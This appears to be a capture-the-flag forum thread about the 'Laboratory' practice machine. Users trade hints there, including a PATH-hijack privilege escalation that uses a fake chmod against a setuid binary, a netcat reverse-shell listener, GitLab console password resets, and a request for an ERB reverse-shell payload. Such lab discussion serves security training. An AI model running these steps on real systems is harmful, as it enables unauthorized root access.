[ARhOmOuTEd]

Can you explain how did you do it/find it? I'm really stuck to understand the meaning of the bin, i did ltrace and all but i still can't figure out how to privesc from here.

---

Nvm I did it, i rooted it. I may be blind.

How did you do it? Can you please explain?

There is setuid binary /usr/local/bin/docker-security.  This chmod's the docker socket, but doesn't declare a full path for the chmod command.  We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But i'm still stuck in docker. how did you break out of docker?

[iecoo7Ei]

Can you explain how did you do it/find it? I'm really stuck to understand the meaning of the bin, i did ltrace and all but i still can't figure out how to privesc from here.

---

Nvm I did it, i rooted it. I may be blind.

How did you do it? Can you please explain?

There is setuid binary /usr/local/bin/docker-security.  This chmod's the docker socket, but doesn't declare a full path for the chmod command.  We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But i'm still stuck in docker. how did you break out of docker?

You don't need to break out of docker.  Can you become admin on gitlab?

[Kali76]

Ehi I have rails console block in Switch to inspect mode ... it happened to you??

[email protected]:/tmp$ gitlab-rails console
gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
Switch to inspect mode.

---

ok solved..

[email protected]:~/gitlab-rails/working$ gitlab-rails console
gitlab-rails console
--------------------------------------------------------------------------------
GitLab: 12.8.1 (d18b43a5f5a) FOSS
GitLab Shell: 11.0.0
PostgreSQL: 10.12
--------------------------------------------------------------------------------
Loading production environment (Rails 6.0.2)
irb(main):001:0>

[ARhOmOuTEd]

Can you explain how did you do it/find it? I'm really stuck to understand the meaning of the bin, i did ltrace and all but i still can't figure out how to privesc from here.

---

Nvm I did it, i rooted it. I may be blind.

How did you do it? Can you please explain?

There is setuid binary /usr/local/bin/docker-security.  This chmod's the docker socket, but doesn't declare a full path for the chmod command.  We can make the command execute a fake chmod and become root:

$ cd $(mktemp -d)
$ echo "bash" > chmod
$ chmod +x ./chmod
$ PATH=$(pwd):$PATH docker-security

But i'm still stuck in docker. how did you break out of docker?

You don't need to break out of docker.  Can you become admin on gitlab?

Thanks, you helped me out, i got root know! :-)

[helloclarice]

Nicely done gentleman ...

I don't know how some of these boxes are 20 pointers !

[exord26]

can any one post walkthrough until user flag?

[JustMeAndYou]

can any one post  walkthrough until user flag?

Everything’s in this thread to get to the shell, when in the shell Google change password gitlab docker. Follow the instructions and login as dexter.

[exord26]

can any one post  walkthrough until user flag?

Everything’s in this thread to get to the shell, when in the shell Google change password gitlab docker. Follow the instructions and login as dexter.

i change but now ?
how continue ?

[Shut]

Can anyone explain this box clearly to get root :)

[0xvijay]

Can anyone explain this box clearly to get root :)

Laboratory writeup is available
https://0xdedinfosec.github.io
Hash ->
AMvgOmRCNzBloX3T$rd5nRPwkBPHenf6VLHfsXb066LNq0MZBRYeEsuCZviD8nQGvVLMaW9iH1hb5FPHzdl.McOJ8GrFIFfdSnIo4t1
If you like the writeup pls leave a comment 😇

[Shut]

Can anyone explain this box clearly to get root :)

Laboratory writeup is available
https://0xdedinfosec.github.io
Hash ->
AMvgOmRCNzBloX3T$rd5nRPwkBPHenf6VLHfsXb066LNq0MZBRYeEsuCZviD8nQGvVLMaW9iH1hb5FPHzdl.McOJ8GrFIFfdSnIo4t1
If you like the writeup pls leave a comment 😇

thanks for writeup :)

[cbra02011980ioj]

[quote="Kali76" pid='3074893' dateline='1605522510']

>>ok I hve a shell but where is user flag?
>>[email protected]:~# rlwrap nc -nlvp 5555
>>Ncat: Version 7.80 ( https://nmap.org/ncat )
>>Ncat: Listening on :::5555
>>Ncat: Listening on 0.0.0.0:5555
>>Ncat: Connection from 10.10.10.216.
>>Ncat: Connection from 10.10.10.216:42898.

Can you tell what the erb payload you've used?      (erb = ERB.new("<%=' ?????????????????' %>")
I've successfully put key in /var/opt/gitlab/.ssh/authorized_keys and even check that my key is there, but I can't connect with ssh
Now I want to try reverse shell, but can't find proper payload